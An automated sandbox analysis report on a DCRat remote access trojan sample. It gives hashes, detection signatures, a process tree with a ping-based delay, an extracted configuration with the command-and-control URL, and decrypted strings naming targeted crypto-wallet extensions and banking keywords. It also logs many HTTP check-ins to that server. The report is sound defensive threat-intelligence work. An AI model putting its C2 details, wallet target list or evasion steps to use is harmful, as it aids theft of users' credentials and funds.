Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3e88PGFfkf.exe

Overview

General Information

Sample name:3e88PGFfkf.exe
renamed because original name is a hash value
Original sample name:99209E1F30A833E0C7654FCC0AA2C9C5.exe
Analysis ID:1579264
MD5:99209e1f30a833e0c7654fcc0aa2c9c5
SHA1:75ac3347aae0a9dc3520ce0d31ca6ee2c7f4bbe5
SHA256:4cb5fdd185102520c29c5975190f67567eeffaa42dc3692ee0cc9595b8a07e20
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3e88PGFfkf.exe (PID: 3732 cmdline: "C:\Users\user\Desktop\3e88PGFfkf.exe" MD5: 99209E1F30A833E0C7654FCC0AA2C9C5)
    • cmd.exe (PID: 2172 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3180 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 4488 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://185.230.138.58/video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
3e88PGFfkf.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Recovery\WinStore.App.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000005.00000002.4176520773.00000000035F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1698323315.0000000000F52000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 2 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.3e88PGFfkf.exe.f50000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\3e88PGFfkf.exe, ProcessId: 3732, TargetFilename: C:\Program Files (x86)\microsoft onedrive\LogoImages\dllhost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-21T10:07:18.951127+010020480951A Network Trojan was detected192.168.2.449730185.230.138.5880TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: 3e88PGFfkf.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.batAvira: detection malicious, Label: BAT/Delbat.C
                        Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                        Source: C:\Users\user\Desktop\NWogOZDl.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                        Source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                        Source: C:\Users\user\Desktop\YIOWuXMo.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                        Source: C:\Recovery\WinStore.App.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                        Source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                        Found malware configuration
                        Source: 3e88PGFfkf.exeMalware Configuration Extractor: DCRat {"C2 url": "http://185.230.138.58/video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exeReversingLabs: Detection: 78%
                        Source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeReversingLabs: Detection: 78%
                        Source: C:\Recovery\WinStore.App.exeReversingLabs: Detection: 78%
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\Desktop\FsgregnE.logReversingLabs: Detection: 29%
                        Source: C:\Users\user\Desktop\NWogOZDl.logReversingLabs: Detection: 50%
                        Source: C:\Users\user\Desktop\YIOWuXMo.logReversingLabs: Detection: 50%
                        Source: C:\Users\user\Desktop\bAJNFhyM.logReversingLabs: Detection: 15%
                        Source: C:\Users\user\Desktop\lhYdlwRP.logReversingLabs: Detection: 15%
                        Source: C:\Users\user\Desktop\yXpCqrRs.logReversingLabs: Detection: 29%
                        Multi AV Scanner detection for submitted file
                        Source: 3e88PGFfkf.exeVirustotal: Detection: 65%Perma Link
                        Source: 3e88PGFfkf.exeReversingLabs: Detection: 78%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\Desktop\mezlGwgJ.logJoe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exeJoe Sandbox ML: detected
                        Source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\lhYdlwRP.logJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\FsgregnE.logJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\yXpCqrRs.logJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\vJMbuDiW.logJoe Sandbox ML: detected
                        Source: C:\Recovery\WinStore.App.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\bAJNFhyM.logJoe Sandbox ML: detected
                        Source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: 3e88PGFfkf.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 3e88PGFfkf.exeString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"}}
                        Source: 3e88PGFfkf.exeString decryptor: ["ZpE84grduJmx18j1AcFKDQQY93Bh5JjhLKQdgERMjYHISeUNudX5OuTJYp8AfKhkjFmqsGU6K2loIIGfjxwcwoTa0HE0FRqZ1hiN1nfoIbuVJpAQjdbrXEy5vL0kBd03","3d52a86e45d8d502a99264560f361829f86db69ae8a312d99a9e66965ef576b5","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
                        Source: 3e88PGFfkf.exeString decryptor: [["http://185.230.138.58/video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/","PhpUpdateSqlDatalife"]]
                        Source: 3e88PGFfkf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDirectory created: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDirectory created: C:\Program Files\Windows Multimedia Platform\d8d7f04fab25b9Jump to behavior
                        Source: 3e88PGFfkf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 4x nop then jmp 00007FFD9B89DFC6h0_2_00007FFD9B89DDAD
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeCode function: 4x nop then jmp 00007FFD9BACDFC6h5_2_00007FFD9BACDDAD

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 185.230.138.58:80
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 384Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1680Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1888Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1888Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: multipart/form-data; boundary=----hMBq0KT2X8lvTQ5wT3fyVw6ZMMkyn3lLsIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 186942Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1880Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1892Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.230.138.58Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
